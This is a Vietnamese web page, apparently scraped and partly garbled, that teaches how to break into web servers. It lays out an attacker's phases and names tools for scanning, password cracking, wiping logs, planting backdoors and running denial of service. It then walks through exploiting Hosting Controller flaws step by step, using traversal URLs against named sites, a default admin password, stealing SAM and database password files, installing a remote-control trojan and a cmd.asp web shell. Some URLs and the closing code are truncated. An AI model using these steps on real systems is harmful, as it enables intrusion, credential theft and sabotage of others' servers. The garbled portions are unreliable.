Cách xâm nhập vào máy chủ
Bạn đang хem: Cáᴄh haᴄk máу tính người kháᴄ từ хa Bạn ᴄó thể muốn haᴄk ᴡebѕite ᴠà đặt quảng ᴄáo ᴄủa bạn ᴄó haу lấу một ѕố thông tin ᴄơ ѕở dữ liệu Trong loại haᴄking, bạn đang ᴄhơi ᴠới máу tính ᴄủa máу ᴄhủ ᴡeb thaу ᴠì máу tính ᴄủa quản trị ᴠiên.Bởi ᴠì, ᴡᴡᴡ.ᴡebѕite.ᴄom đượᴄ lưu trữ trong máу ᴄhủ ᴡeb riêng biệt ᴄhứ không phải là máу tính ᴄá nhân.Một ᴄó thể đượᴄ truу ᴄập ᴠào máу tính ᴄủa bạn ᴄủa bạn từ nhà ᴄủa bạn.Một lần nữa đâу là dựa trên IP ᴠà điều nàу ᴄhỉ ᴄó thể ᴄó khi máу tính ᴄủa bạn ᴄủa bạn đang trựᴄ tuуến.Nếu nó tắt hoặᴄ không kết nối ᴠới internet thì ᴄhỉ IP từ хa haᴄking là hoàn toàn không thể.Xáᴄ nhận ᴄáᴄ trang ᴡeb hoặᴄ một máу tính mà bạn muốn haᴄk.Tìm hoặᴄ theo dõi địa ᴄhỉ IP ᴄủa họ.Hãу ᴄhắᴄ ᴄhắn rằng địa ᴄhỉ IP đang trựᴄ tuуếnQuét ᴄáᴄ ᴄổng mởKiểm tra ᴄáᴄ ᴄổng đáng kínhtruу ᴄập thông qua ᴄổngBrute-forᴄe tên đăng nhập ᴠà mật khẩuĐể làm gì ᴠì ᴠậу tôi ѕẽ ѕử dụng "netѕtat" lệnh trong ᴄửa ѕổ.Nếu bạn muốn biết địa ᴄhỉ IP ᴄủa một người ᴄụ thể trên Faᴄebook hoặᴄ orkut haу bất kỳ ᴄuộᴄ trò ᴄhuуệndịᴄh ᴠụ, ᴄhỉ ᴄó một ᴄáᴄh: Chỉ mời hoặᴄ ping ông ᴄho một ᴄuộᴄ trò ᴄhuуện ᴠà trong khi ᴄhat là ON mở "Command Prompt" trên máу tính ᴄủa bạn (Bắt đầu > Run> ᴄmd). Xem thêm: lưu ý:trướᴄ khi ᴄố gắng nàу ᴄhắᴄ ᴄhắn rằng bạn đóng tất ᴄả ᴄáᴄ tab kháᴄ trong trình duуệt ᴄủa bạn ᴠà ᴄhỉ faᴄebook đang mở.Ngoài ra nếu ᴄó thể хóa tất ᴄả lịᴄh ѕử ᴠà bộ nhớ ᴄaᴄhe từ trình duуệt ᴄủa bạn.Lưu ý:Bạn không ᴄó thể theo dõi những người đứng ѕau proху ѕerᴠer! Chuуên mụᴄ: Domain Hoѕting
Các bước Hack Server ! Các bước của hacker khi muốn đột nhập vào một hệ thống máy chủ : FootPrinting : Các mục tiêu của bước này chủ yếu là những thông tin ban đầu về server . Công nghệ bạn cần sử dụng là : Open source search ( nguồn máy chủ tìm kiếm ) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( bộ phận này chủ yếu là kiểm tra về người chủ server , DNS cấu trúc server chưa thể hiện rõ ở đây ) 1 số công cụ : UseNet , search engines ( công cụ tìm kiếm ) , Edgar Any Unix client , http://www.networksolutions.com/whois , http://www.arin.net/whois , dig , nslookup Is -d , Sam spade Scanning : Phần lớn các server chịu bung thông tin quan trọng trong bước này , hãy cố gắng tận dụng bước này triệt để để biết các port trên server , nghe đường dữ liệu . Công nghệ bạn cần sử dụng là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công cụ : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso , siphon . Enumeration : Đến bước này , các attacker bắt đầu kiểm soát server sơ bộ , xác định các account trên server , mức độ bảo vệ Công nghệ bạn cần sử dụng là : List user accounts , List file share , Identify applications . Các tool phụ trợ : null sessions , DumpACL , sid2user , OnSite Admin showmount , NAT , Legion banner grabbing với telnet , netcat , rpcinfo . Gaining access : Aha , đã có đủ dữ liệu để kết hợp tất cả chúng lại . Chúng ta bắt đầu đến gần mục tiêu . Hãy nắm chắc cơ hội . 1 account có thể bị Crack . Công nghệ : Password eavesdropping , File Share brute forcing , Password file grab , buffer overflows . Các tool : tcpdump , L0phtcrack readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL Escalating privilege : Nếu 1 account không may mắn nào ở một cấp độ nào đó bị crack ở bước trên , chúng ta sẽ có cái tận dụng để điều khiển Server . Công nghệ : Password cracking , BUG ,Exploits . Tools : john , L0phtcrack , Ic_messages , getadmin , sechole . Pilfering : Thông tin lấy từ bước trên đủ để ta định vị server và điều khiển server . Nếu bước này không thành công , hãy đến bước <9> . Công nghệ : Evaluate trusts , Search for cleartext passwords . Tool : rhost , LSA Secrets user data , configuration files , Registry . Covering Tracks : Hệ thộng luôn ghi nhận những hành động của bạn . Nếu bây giờ mà kết thúc , chắc bạn bị tóm ngay . Đây là bước cực kì quan trọng . XÓA LOG . Công nghệ : Clear logs , hide tools . Tools : Zap , Event log GUI , rootkits , file streaming . Creating Backdoors : Còn phải hỏi , bạn phải để lại 1 cái cổng sau , lần sau có vào thì dễ hơn chứ . Nếu không thành công , quay lại bước <4> xem lại các quyền của user bạn sử dụng . Công nghệ : Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services , install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel , administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K , keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll Denial of Servies : 1 attacker không thành công với những gì anh ta đã làm họ sẽ tận dụng những exploits code để làm cho server ngừng hoạt động luôn , gọi đó là : tấn công từ chối dịch vụ . Công nghệ : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset bugs , Out of bounds TCP options ( OOB ) DDoS . Tools phụ trợ : synk4 , ping of death , smurf land , latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht Những tool trên , bạn có thể search ở các máy tìm kiếm như http://www.google.com Hack Server NT qua bug Hosting Controller : Lỗi HC là lỗi của phần mềm Hosting Controller dùng để quản lý server cung cấp domain và hosting cho khách hàng thường được chạy dưới Win2000/NT. Tôi sẽ Hack qua lỗi HC và sẽ ví dụ với 1 server chưa fix đó là server chứa 38 site mà đã được Hacker Forum Hacked vào tháng trước . + Lỗi HC cho bạn thực hiện 1 dòng lệnh để đọc ổ cứng ( C; D; E ) thậm chí cả ổ A của server qua 1 site hoặc trực tiếp bằng ID của server. Lỗi HC thực chất là bị lỗi của 4 file nằm trong phần mềm là : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp Tôi sẽ viết cấu trúc của lệnh Hack vào server nhờ lỗi 4 file này : Trong đó HC có thể là : admin ; advadmin; hostingcontroller Lỗi đầu tiên tôi giới thiệu với các bạn có tên Multiple security vulnerabilities. Đây là các đoạn Script cho phép bạn duyệt bất cứ file nào trên Server : http://www.victim.com/advwebadmin/stats/st epath=c:/&Opt=3 http://www.victim.com/advwedadmin/serv_u/s epath=c:/&Opt=3 http://www.victim.com/advwedadmin/adminset epath=c:/&Opt=3 http://www.victim.com/advwedadmin/adminset epath=c:/&Opt=3 http://www.victim.com/advwedadmin/SQLServ/ epath=c:/&Opt=3 Trong đó Victim là Server bị lỗi HC mà bạn muốn Hack Tôi sẽ ví dụ các Hack server qua 1 site nằm trong server (hay còn gọi là Hack local exploit) VD : site này đã bị Hacker Forum hack : http://123hollywood.com/hf.htm ở thanh Address bạn đánh 1 trong các dòng lệnh sau : http://123hollywood.com/admin/stats/statsb =c:\&Opt=3 http://123hollywood.com/admin/serv_u/servu =c:\&Opt=3 http://123hollywood.com/admin/adminsetting =c:\&Opt=3 http://123hollywood.com/admin/adminsetting =c:\&Opt=3 http://123hollywood.com/admin/SQLServ/sqlb =c:\&Opt=3 Lúc nãy bạn sẽ vào được phần "Browser Directories". Đây là toàn bộ cấu trúc của Website đó. Khi các bạn đã vào được bên trong của ổ C:\ bạn thấy có thư mục websites (đối với server đang thử nghiệm này, còn đối với các server khác thì nó thường nằm ở ổ D:/) . Nếu bạn đã thấy thì OK . Bạn hãy vào trong và thấy 1 loạt các website. Với server chúng ta đang Hack ở trên bạn sẽ thấy các website được đưa vào các thư mục riêng lẻ theo vần. Chúng ta hãy tìm tới website mà nhờ nó chúng ta vào dược server này . Bạn hãy vào 123web/123kinh/123hollywood.com/www/. Bạn thấy đó cực kỳ đơn giản đúng không . Sau khi biết được đường dẫn của site cần Hack thì bạn dùng Script sau : http://www.example.com/advwebadmin/folders om&OpenPath=C:/ Thay example bằng tên của Server và testing bằng tên trang Web muốn Hack Ví dụ : Bạn đăng ký Website tên cuonglong của FPT thì tụi FPT sẽ cho bạn một nơi để trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www Muốn Hack trang này thì bạn đánh Script như trên : http://www.ftp.com/advwebadmin/folders/fil om&OpenPath=C:/ Vậy là bạn đã vào được cấu trúc thư mục của Web đó nhưng lúc này bạn chỉ quyền upload 1 file nào đó từ ổ cứng của bạn lên site đó thôi Sau đó bạn upload file ntdaddy.asp Website đó. Và chạy file này trên Website đó để lấy những file *.mdb và *.SAM về, đây là file chứa password, bạn chỉ việc giải mã ra Vậy là bạn đã Hack được Website đó rồi Bây giờ tôi sẽ hướng dẫn các bạn cách upload và xoá file trên các site này : Cái này thì cũng cực kỳ đơn giản, bạn hãy xem mẫu sau : http://www.eg.com/hc/folders/filemanager.a om&OpenPath=C:/ trong đó testing là các đường dẫn vào website mà bạn muốn upload ; OK ! Bây giờ thì bạn có thể nghịch thoải mái; Bạn có thể cho toàn bộ site die trong 1 giờ cũng được hi hi Còn 1 vài lỗi nữa của HC, trong đó có lỗi cho phép bạn có khả năng khởi tạo cho mình 1 hosting trong server nhờ dòng lệnh sau : http://victim.com/admin/autosignup/dsp_newwebadmin.asp Cũng như trên, Victim là Server bị lỗi HC mà bạn muốn Hack. Ví dụ đó là Website http://bigguy.ourweb.net/ http://bigguy.ourweb.net/AdvAdmin/autosign newwebadmin.asp Mình đã khởi tạo cái này, các bác vô xem : http://www.hackerforum.com/ Lỗi này cho phép cho đăng ký free Domain. Bạn hãy đăng ngay 1 Domain cho mình rồi vào http://www.victim.com/AdvAmin/ để Login với với Account vừa đăng ký. Sau khi Login, bạn click vào mục Directories trên menu rồi vào Domain của bạn. Sau đó, bạn hãy upload trang web của mình lên (nơi upload ở dưới cùng) và nhớ là tên trang web đừng dài, rồi click vào logout (ở bên phải trên cùng). Vậy là ta đã đi được nửa chặng đường Tiếp theo bạn hãy vào : http://www.victim.com/AdvAdmin/import/imp_ in.com\www Bạn hãy thay chữ "username" bằng username lúc đầu bạn đăng ký Domain và thay chữ www.yourdomain.com bằng địa chỉ Domain mà bạn đăng ký và enter. Ví dụ tôi đăng ký 1 Domain tên http://www.cuonglong.com/ với username là ncviet ở Website http://bigguy.ourweb.net/ thì tôi sẽ gõ : http://bigguy.ourweb.net/AdvAdmin/import/i onglong.com/www Đây là phần Import của Website. Nó sẽ hiện ra 4 khung đường dẫn. Bây giờ bạn hãy tìm trang web của mình ở khung thứ nhất bên dưới và click vào nó rồi nhấn nút "import". Bây giờ nó đã copy trang Web của bạn vào khung thứ hai bên dưới. Ok, vậy là bạn đã Hack xong rồi đó. ví dụ bạn upload file cl.htm thì đường dẫn Web của bạn sẽ là : http://bigguy.ourweb.net/AdvAdmin/cl.htm Chú ý : http://www.victim.com/ sẽ được thay bằng Website bị lỗi hc. Và có thể trong quá trình hack, server sẽ bắt giữ IP của bạn vì vậy bạn nên ngụy trang cho thật khéo . Bạn có thể tìm rất nhiều server hiện vẫn còn đang bị lỗi này bằng cách và http://www.google.com/ rồi nhập từ khoá "Hosting Controller" cho nó Search. Tiếp theo là một lỗi slash dot dot của HC cho phép ta thấy được đường dẫn các ổ đĩa và các thư mục của server và ta có thể lợi dụng nó để add (thêm vào) một đường dẫn DSN để chỉ tới một địa chỉ mới. Để khai thác lỗi này bạn dùng đoạn code sau : http://www.target.com/admin/dsn/dsnmanager \ \ Cái thứ hai là chúng ta có thể thay đổi hoàn toàn hay add vào thư mục admin và thi hành những gì chúng ta muốn. Để khai thác lỗi này chỉ cần đưa vào đoạn code sau : http://www.target.com/admin/import/imp_roo tpPath=C:\ Bạn có thể nắm quyền điều khiển toàn bộ các file trong thư mục (và có thể là cả C:\) và thay đổi tùy thích Và lỗi cuối cùng là default password, nếu admin không xoá hay thay đổi user có tên là AdvWebadmin (user default) thì điều này rất nguy hiểm, bởi vì ta có thể nắm quyền điều khiển hoàn toàn server (hay 1 phần) thông qua password default cho user này là "advcomm500349", sau đó thì hack chỉ là việc dễ dàng. Tiện thể mình cũng chỉ thêm cho các bạn cách cài trojan hoặc 1 chương trình DoS (Denial of Service) vào server mà ban đã vào được để phục vụ cho công việc Hack cho mình sau này. Thường thì khi Hack qua lỗi HC bạn rất khó có thể cài thẳng chương trình vào ổ C:/ như lỗi IIS được. Nhưng chúng ta vẫn có thể cài 1 chương trình nhờ chúng ta setup qua site nằm trong server. Bạn hãy Upload 1 con trojan vào 1 site mà chúng ta muốn (Cách Upload như trên đã nói). Sau đây tôi sẽ cài 1 con reaccserver có chức năng khi cài vào 1 server chúng ta có thể điều khiển server bằng máy tính ở nhà mình. Tôi upload file reaccserver.exe lên site http://123hollywood.com/ . Bây giờ muốn cài đặt trojan này vào trong server bạn hãy đánh dòng sau : http://123hollywood.com/reaccserver.exe Bạn tự hỏi làm sao mà nó có thể cài vào được server mà không qua thông báo ở máy chứ. Đúng, thường thì các phần mềm quản lý Hosting sẽ thông báo ở máy chủ nhưng thường thì người quản lý server sẽ bỏ qua chế độ này khi cài đặt HC Khi bạn đánh dòng trên nếu thành công thì ở IE sẽ thông báo "server setup file full". Nếu không thành công nó sẽ báo "Can't not Found". Lúc này bạn hãy đánh lại : http://123hollywood.com/ / / /reaccserver.exe Đảm bảo sẽ OK Chú ý : khi setup file đó thì PC của bạn cũng sẽ bị cài đặt chương trình đó. Bạn hãy gỡ nó ra . Vừa rồi mình đã cài đặt trojan reaccserver rồi. Bây giờ bạn hãy dùng phần còn lại của chương trình là file cp.exe. Chúng ta có thể Shutdown hoặc Restart server kia. Thường thì server sẽ mất ít nhất 3 phút để khởi động lài . Bây giờ mình cũng nói thêm về lỗi 1 số Website ở các server cài đặt HC là thường để các file upload.asp nằm ở trong các thư mục của Website. Vì vậy mặc dù lỗi HC có bị fix thì chúng ta cũng Hack như thường . Đây là ví dụ : http://www.aten2000.com/aspupload_samples_ rmAndScript.asp Bạn thấy chưa ! Mình có thể upload bất cứ file nào mà mình muốn . Bây giờ mình thử tìm cấu trúc thường c1o của 1 website cài HC nha. Bạn hãy vào đây : http://www.aten2000.com/cmd.asp để xem toàn bộ server với các lệnh dir C:\ ; dir D:\ ; dir E:\ và đọc file bằng lệnh type C:\ [đườngdẫn] > Chú ý : lệnh này có thể đọc được bất cứ file nào . Bạn thử tìm trong đó mà xem cũng có nhiều lắm . À khi các bạn vào được server, bạn nên cài 1 file ASP để đọc ổ cứng cho đễ. Đây là cấu trúc của file cmd.asp : <%@ Language=VBScript %> <% ' o0o ' File: CmdAsp.asp ' Author: Maceo |